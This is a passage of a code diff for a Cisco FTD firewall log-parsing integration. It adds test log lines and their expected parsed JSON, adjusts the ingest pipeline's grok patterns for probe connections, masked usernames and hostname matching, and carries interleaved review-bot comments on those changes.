"number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.131", + "nat": { + "ip": "175.16.199.6", + "port": 40846 + }, + "port": 5248 + }, + "tags": [ + "preserve_original_event", + "private_is_internal" + ] + }, + { + "@timestamp": "2023-05-09T15:50:47.000Z", + "cisco": { + "ftd": { + "connection_id": "154498453", + "destination_interface": "Outside1", + "mapped_destination_ip": "89.160.20.131", + "mapped_destination_port": 443, + "mapped_source_ip": "175.16.199.6", + "mapped_source_port": 40846, + "source_interface": "Inside1" + } + }, + "destination": { + "address": "89.160.20.131", + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.131", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "302013", + "kind": "event", + "original": "<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Outside1:89.160.20.131/443 (89.160.20.131/443)", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "fw-bld1-1" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 166, + "severity": { + "code": 6 + } + } + }, + "network": { + "community_id": "1:3W4wan8g9ISYpx9IpbIc54Q1o/w=", + "direction": "outbound", + "iana_number": "6", 
+ "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "Outside1" + } + }, + "hostname": "fw-bld1-1", + "ingress": { + "interface": { + "name": "Inside1" + } + }, + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "fw-bld1-1" + ], + "ip": [ + "10.0.1.50", + "175.16.199.6", + "89.160.20.131" + ] + }, + "source": { + "address": "10.0.1.50", + "ip": "10.0.1.50", + "nat": { + "ip": "175.16.199.6", + "port": 40846 + }, + "port": 5248 + }, + "tags": [ + "preserve_original_event", + "private_is_internal" + ] + }, + { + "@timestamp": "2023-05-09T15:50:47.000Z", + "cisco": { + "ftd": { + "connection_id": "154498453", + "destination_interface": "Inside1", + "mapped_destination_ip": "89.160.20.131", + "mapped_destination_port": 443, + "mapped_source_ip": "175.16.199.6", + "mapped_source_port": 40846, + "source_interface": "Outside1" + } + }, + "destination": { + "address": "10.0.1.50", + "ip": "10.0.1.50", + "nat": { + "ip": "89.160.20.131" + }, + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "302013", + "kind": "event", + "original": "<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Outside1:89.160.20.131/5248 (175.16.199.6/40846) to Inside1:10.0.1.50/443 (89.160.20.131/443)", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "fw-bld1-1" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 166, + "severity": { + "code": 6 + } + } + }, + "network": { + "community_id": "1:G8j+ms0Bhz2T9H+SyWVoctzVJUE=", + "direction": "inbound", + "iana_number": "6", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "Inside1" + } + }, + "hostname": "fw-bld1-1", + "ingress": { + "interface": { + "name": "Outside1" + } + }, + "product": "ftd", + "type": 
"idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "fw-bld1-1" + ], + "ip": [ + "89.160.20.131", + "175.16.199.6", + "10.0.1.50" + ] + }, + "source": { + "address": "89.160.20.131", + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.131", + "nat": { + "ip": "175.16.199.6", + "port": 40846 + }, + "port": 5248 + }, + "tags": [ + "preserve_original_event", + "private_is_internal" + ] + }, + { + "@timestamp": "2023-05-09T15:50:47.000Z", + "cisco": { + "ftd": { + "connection_id": "154498453", + "destination_interface": "Inside2", + "mapped_destination_ip": "89.160.20.131", + "mapped_destination_port": 443, + "mapped_source_ip": "175.16.199.6", + "mapped_source_port": 40846, + "source_interface": "Inside1" + } + }, + "destination": { + "address": "10.0.1.50", + "ip": "10.0.1.50", + "nat": { + "ip": "89.160.20.131" + }, + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "302013", + "kind": "event", + "original": "<166>May 09 2023 15:50:47 fw-bld1-1 : %FTD-6-302013: Built inbound Probe TCP connection 154498453 for Inside1:10.0.1.50/5248 (175.16.199.6/40846) to Inside2:10.0.1.50/443 (89.160.20.131/443)", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "fw-bld1-1" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 166, + "severity": { + "code": 6 + } + } + }, + "network": { + "community_id": "1:z5q8NYG9K8KFtSXwZWp6YhfDuEg=", + "direction": "internal", + "iana_number": "6", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "Inside2" + } + }, + 
"hostname": "fw-bld1-1", + "ingress": { + "interface": { + "name": "Inside1" + } + }, + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "fw-bld1-1" + ], + "ip": [ + "10.0.1.50", + "175.16.199.6", + "89.160.20.131" + ] + }, + "source": { + "address": "10.0.1.50", + "ip": "10.0.1.50", + "nat": { + "ip": "175.16.199.6", + "port": 40846 + }, + "port": 5248 + }, + "tags": [ + "preserve_original_event", + "private_is_internal" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-session.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-session.log new file mode 100644 index 00000000000..8e3ffa0cda1 --- /dev/null +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-session.log @@ -0,0 +1 @@ +<164>Feb 19 2024 16:29:38: %FTD-4-113019: Group = VPN, Username = abcd, IP = 10.0.100.30, Session disconnected. Session Type: SSL, Duration: 1h:24m:30s, Bytes xmt: 25292048, Bytes rcv: 12546398, Reason: User Requested \ No newline at end of file diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-session.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-session.log-expected.json new file mode 100644 index 00000000000..683026fd8d9 --- /dev/null +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-ftd-session.log-expected.json 
@@ -0,0 +1,71 @@ +{ + "expected": [ + { + "@timestamp": "2024-02-19T16:29:38.000Z", + "cisco": { + "ftd": { + "session_type": "SSL" + } + }, + "destination": { + "address": "10.0.100.30", + "bytes": 12546398, + "ip": "10.0.100.30" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "client-vpn-disconnected", + "code": "113019", + "duration": 5070000000000, + "end": "2024-02-19T16:29:38.000Z", + "original": "<164>Feb 19 2024 16:29:38: %FTD-4-113019: Group = VPN, Username = abcd, IP = 10.0.100.30, Session disconnected. Session Type: SSL, Duration: 1h:24m:30s, Bytes xmt: 25292048, Bytes rcv: 12546398, Reason: User Requested", + "reason": "User Requested", + "severity": 4, + "start": "2024-02-19T15:05:08.000Z", + "timezone": "UTC" + }, + "log": { + "level": "warning", + "syslog": { + "facility": { + "code": 20 + }, + "priority": 164, + "severity": { + "code": 4 + } + } + }, + "network": { + "bytes": 37838446 + }, + "observer": { + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "ip": [ + "10.0.100.30" + ], + "user": [ + "abcd" + ] + }, + "source": { + "bytes": 25292048, + "user": { + "group": { + "name": "VPN" + }, + "name": "abcd" + } + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log index 1bda42701cf..c2904f95a64 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log 
@@ -45,6 +45,9 @@ Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447 Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown Probe TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown Probe TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown Probe TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index f7f95d236fe..141ac1217f3 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json 
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json 
@@ -3413,6 +3413,252 @@ "preserve_original_event" ] }, + { + "@timestamp": "2018-12-11T08:01:31.000Z", + "cisco": { + "ftd": { + "connection_id": "447236", + "destination_interface": "dmz", + "source_interface": "outside" + } + }, + "destination": { + "address": "192.168.1.34", + "ip": "192.168.1.34", + "port": 5678 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "flow-expiration", + "category": [ + "network" + ], + "code": "302014", + "duration": 0, + "end": "2018-12-11T08:01:31.000Z", + "kind": "event", + "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown Probe TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "reason": "TCP FINs", + "severity": 6, + "start": "2018-12-11T08:01:31.000Z", + "timezone": "UTC", + "type": [ + "connection", + "end" + ] + }, + "host": { + "hostname": "127.0.0.1" + }, + "log": { + "level": "informational" + }, + "network": { + "bytes": 14804, + "community_id": "1:jpl9i9YcwfmJL6rzeoC+kNxutF0=", + "iana_number": "6", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "dmz" + } + }, + "hostname": "127.0.0.1", + "ingress": { + "interface": { + "name": "outside" + } + }, + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "192.168.2.222", + "192.168.1.34" + ] + }, + "source": { + "address": "192.168.2.222", + "ip": "192.168.2.222", + "port": 1234 + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2018-12-11T08:01:38.000Z", + "cisco": { + "ftd": { + "connection_id": "447234", + "destination_interface": "dmz", + "source_interface": "outside" + } + }, + "destination": { + "address": "192.168.1.35", + "ip": "192.168.1.35", + "port": 5678 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "flow-expiration", + "category": [ + "network" + ], + "code": "302014", + "duration": 68000000000, + "end": 
"2018-12-11T08:01:38.000Z", + "kind": "event", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown Probe TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "reason": "TCP FINs", + "severity": 6, + "start": "2018-12-11T08:00:30.000Z", + "timezone": "UTC", + "type": [ + "connection", + "end" + ] + }, + "host": { + "hostname": "127.0.0.1" + }, + "log": { + "level": "informational" + }, + "network": { + "bytes": 134781, + "community_id": "1:0O2zwShv7d4alKTT/UJuXDWhJtE=", + "iana_number": "6", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "dmz" + } + }, + "hostname": "127.0.0.1", + "ingress": { + "interface": { + "name": "outside" + } + }, + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "192.168.2.222", + "192.168.1.35" + ] + }, + "source": { + "address": "192.168.2.222", + "ip": "192.168.2.222", + "port": 1234 + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2018-12-11T08:01:38.000Z", + "cisco": { + "ftd": { + "connection_id": "447234", + "destination_interface": "dmz", + "source_interface": "outside" + } + }, + "destination": { + "address": "192.168.1.35", + "ip": "192.168.1.35", + "port": 5678 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "flow-expiration", + "category": [ + "network" + ], + "code": "302014", + "duration": 68000000000, + "end": "2018-12-11T08:01:38.000Z", + "kind": "event", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown Probe TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "reason": "TCP FINs", + "severity": 6, + "start": "2018-12-11T08:00:30.000Z", + "timezone": "UTC", + "type": [ + "connection", + "end" + ] + }, + "host": { + "hostname": "127.0.0.1" + }, + "log": { + "level": "informational" + }, + "network": 
{ + "bytes": 134781, + "community_id": "1:0O2zwShv7d4alKTT/UJuXDWhJtE=", + "iana_number": "6", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "dmz" + } + }, + "hostname": "127.0.0.1", + "ingress": { + "interface": { + "name": "outside" + } + }, + "product": "ftd", + "type": "idps", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "192.168.2.222", + "192.168.1.35" + ] + }, + "source": { + "address": "192.168.2.222", + "ip": "192.168.2.222", + "port": 1234 + }, + "tags": [ + "preserve_original_event" + ] + }, { "@timestamp": "2018-12-11T08:01:38.000Z", "cisco": { @@ -5091,7 +5337,7 @@ } }, { - "@timestamp": "2023-11-01T16:42:22.000Z", + "@timestamp": "2024-11-01T16:42:22.000Z", "cisco": { "ftd": { "connection_id": "1488052803", diff --git a/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml index e3f54fc4786..521b7aa2b31 100644 --- a/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -51,7 +51,7 @@ processors: - grok: field: _temp_.full_message patterns: - - "%{FTD_PREFIX}-(?:%{FTD_SUFFIX:_temp_.cisco.suffix}-)?%{NONNEGINT:event.severity:int}-%{POSINT:_temp_.cisco.message_id}?:?\\s*%{GREEDYDATA:message}" + - "%{FTD_PREFIX}-(?:%{FTD_SUFFIX:_temp_.cisco.suffix}?-)?%{NONNEGINT:event.severity:int}-%{POSINT:_temp_.cisco.message_id}?:?\\s*%{GREEDYDATA:message}" # Before version 6.3, messages for connection, security intelligence, and intrusion events didn't include an event type ID in the message header. - "%{GREEDYDATA:message}" pattern_definitions: @@ -66,7 +66,7 @@ processors: - set: field: _temp_.cisco.message_id value: "" - if: "ctx?._temp_?.cisco?.message_id == null" + if: "ctx._temp_?.cisco?.message_id == null" # # set default event.severity to 7 (debug): 
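Review bot: The added `?` after `%{FTD_SUFFIX:_temp_.cisco.suffix}` in the `@@ -51,7 +51,7 @@` hunk makes the suffix optional inside an already-optional group, which handles the `%FTD--6-852002` form exercised by the new test-ftd-fix.log line but reads like a typo without an explanation. Suggest a comment above the pattern: `# the suffix between "FTD-" and the severity can be absent ("%FTD--6-<id>"), so both the suffix and its trailing dash are optional`. The FTD_PREFIX/FTD_SUFFIX definitions sit outside the hunk, so I cannot confirm an empty match never sets `_temp_.cisco.suffix` to an empty string; the expected output for the 852002 event omits the field, which suggests it does not.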
@@ -76,7 +76,7 @@ processors: - set: field: event.severity value: 7 - if: "ctx?.event?.severity == null" + if: "ctx.event?.severity == null" # Time zone can come from three sources, choose in order: log, config, locale, default to UTC. - set: @@ -290,7 +290,7 @@ processors: patterns: - ^%{NOTSPACE:event.outcome} ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}(/%{POSINT:source.port})?\s*(\(%{CISCO_USER:_temp_.cisco.source_username}\) )?dst %{NOTCOLON:_temp_.cisco.destination_interface}:%{IPORHOST:destination.address}(/%{POSINT:destination.port})?%{DATA}by access-group "%{NOTSPACE:_temp_.cisco.list_id}" pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" CISCO_USER: ((LOCAL\\)?(%{HOSTNAME}\\)?%{USERNAME}(@%{HOSTNAME})?(, *%{NUMBER})?) @@ -318,12 +318,12 @@ processors: field: event.outcome description: "111004" value: "success" - if: "ctx._temp_.cisco.message_id == '111004' && ctx?._temp_?.cisco?.cli_outcome == 'OK'" + if: "ctx._temp_.cisco.message_id == '111004' && ctx._temp_.cisco.cli_outcome == 'OK'" - set: field: event.outcome description: "111004" value: "failure" - if: "ctx._temp_.cisco.message_id == '111004' && ctx?._temp_?.cisco?.cli_outcome == 'FAILED'" + if: "ctx._temp_.cisco.message_id == '111004' && ctx._temp_.cisco.cli_outcome == 'FAILED'" - remove: field: _temp_.cisco.cli_outcome ignore_missing: true 
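Review bot: The `HOSTNAME` pattern definition corrected in the `@@ -290,7 +290,7 @@` hunk is duplicated verbatim in the `@@ -392`, `@@ -400`, `@@ -419` and `@@ -435` hunks, and this commit had to patch every copy by hand; the next fix will again depend on someone finding all of them. Moving the `-` to the end of the character class is the right repair for the range warning, but consider a comment beside each copy, `# keep in sync with the other HOSTNAME definitions in this pipeline`, so the duplication is at least visible. Each grok processor carries its own `pattern_definitions`, so a shared definition may not be expressible here; the comment is the minimum.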
@@ -357,7 +357,7 @@ processors: description: "113005" field: "message" patterns: - - "AAA user authentication Rejected(%{SPACE})?: reason = %{REASON}(%{SPACE})?: server = %{IP:destination.address}(%{SPACE})?: user = ?%{CISCO_USER:source.user.name}(%{SPACE})?: user IP = %{IP:source.address}" + - "AAA user authentication Rejected(%{SPACE})?: reason = %{REASON}(%{SPACE})?: server = %{IP:destination.address}(%{SPACE})?: user = ?(%{CISCO_USER:source.user.name}|\\*+)(%{SPACE})?: user IP = %{IP:source.address}" pattern_definitions: REASON: (AAA failure|Account has been disabled) CISCO_USER: ((LOCAL\\)?(%{HOSTNAME}\\)?%{USERNAME}(@%{HOSTNAME})?(, *%{NUMBER})?) @@ -392,7 +392,7 @@ processors: - "Group <%{NOTSPACE:source.user.group.name}> User <%{CISCO_USER:source.user.name}> IP <%{IP:source.address}>" - "Group %{NOTSPACE:source.user.group.name} User %{CISCO_USER:source.user.name} IP %{IP:source.address}" pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" CISCO_USER: ((LOCAL\\)?(%{HOSTNAME}\\)?%{USERNAME}(@%{HOSTNAME})?(, *%{NUMBER})?) - grok: 
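Review bot: The `\\*+` alternative in the 113005 pattern lets a masked username pass without populating `source.user.name`, which is the right outcome, but the pattern does not say so and a later reader may "fix" it by capturing the asterisks as a user. Suggest a comment above the pattern: `# FTD may render the user as "*****"; match the asterisks but leave source.user.name unset rather than storing a placeholder`. Whether `related.user` is likewise left empty in that case is not visible in this hunk, though the expected output for the new masked-user test line omits it.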
@@ -400,9 +400,9 @@ processors: field: "message" description: "302013, 302015" patterns: - - Built %{NOTSPACE} %{NOTSPACE:network.transport} connection %{NUMBER:_temp_.cisco.connection_id} for %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}/%{NUMBER:source.port} \(%{IPORHOST:_temp_.natsrcip}/%{NUMBER:_temp_.cisco.mapped_source_port}\)(\(%{CISCO_USER:_temp_.cisco.source_username}\))? to %{NOTCOLON:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{NUMBER:destination.port} \(%{NOTSPACE:_temp_.natdstip}/%{NUMBER:_temp_.cisco.mapped_destination_port}\)(\(%{CISCO_USER:_temp_.cisco.destination_username}\))?( \(%{CISCO_USER:_temp_.cisco.termination_user}\))?%{GREEDYDATA} + - Built %{NOTSPACE} (?:Probe )?%{NOTSPACE:network.transport} connection %{NUMBER:_temp_.cisco.connection_id} for %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}/%{NUMBER:source.port} \(%{IPORHOST:_temp_.natsrcip}/%{NUMBER:_temp_.cisco.mapped_source_port}\)(\(%{CISCO_USER:_temp_.cisco.source_username}\))? to %{NOTCOLON:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{NUMBER:destination.port} \(%{NOTSPACE:_temp_.natdstip}/%{NUMBER:_temp_.cisco.mapped_destination_port}\)(\(%{CISCO_USER:_temp_.cisco.destination_username}\))?( \(%{CISCO_USER:_temp_.cisco.termination_user}\))?%{GREEDYDATA} pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" CISCO_USER: ((LOCAL\\)?(%{HOSTNAME}\\)?%{USERNAME}(@%{HOSTNAME})?(, *%{NUMBER})?) 
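Review bot: The new `(?:Probe )?` group in the 302013/302015 pattern discards the `Probe` keyword, so a probe connection yields the same ECS event as a real built connection (`event.code: 302013`, `event.action: firewall-rule`) with nothing but `event.original` to tell them apart; detection logic that counts new connections per source will include probes. Consider capturing the keyword into a `_temp_.cisco` field that a later processor maps to a tag or a `cisco.ftd` field, so the distinction survives into the index. The test-sample.log changes add `Teardown Probe` lines as well, so the 302014 patterns were presumably given the same treatment, but that hunk starts outside this view.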
@@ -419,7 +419,7 @@ processors: - Teardown %{DATA} %{NOTSPACE:network.transport} translation from %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}/%{NUMBER:source.port}(\s*\(%{CISCO_USER:_temp_.cisco.source_username}\))? to %{NOTCOLON:_temp_.cisco.destination_interface}:%{IP:destination.address}/%{NUMBER:destination.port} duration %{DURATION:_temp_.duration_hms} pattern_definitions: NOTCOLON: "[^:]*" - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" CISCO_USER: ((LOCAL\\)?(%{HOSTNAME}\\)?%{USERNAME}(@%{HOSTNAME})?(, *%{NUMBER})?) DURATION: "%{INT}:%{MINUTE}:%{SECOND}" @@ -435,7 +435,7 @@ processors: patterns: - "Built %{NOTSPACE} %{NOTSPACE:network.protocol} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\\s*(?:\\(%{CISCO_USER:_temp_.cisco.destination_username}\\) )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\\s*(?:\\(%{CISCO_USER:_temp_.cisco.source_username}\\) )?(type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})?" pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" ECSSOURCEIPORHOST: "(?:%{IP:source.address}|%{HOSTNAME:source.domain})" 
@@ -935,15 +935,15 @@ processors: if: '["302014", "302016", "302018", "302021", "302036", "302304", "302306"].contains(ctx._temp_.cisco.message_id)' description: "302014, 302016, 302018, 302021, 302036, 302304, 302306" patterns: - - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} from %{NOTCOLON:_temp_.cisco.termination_initiator} \(%{CISCO_USER:_temp_.cisco.termination_user}\) - - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} from %{NOTCOLON:_temp_.cisco.termination_initiator} - - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? 
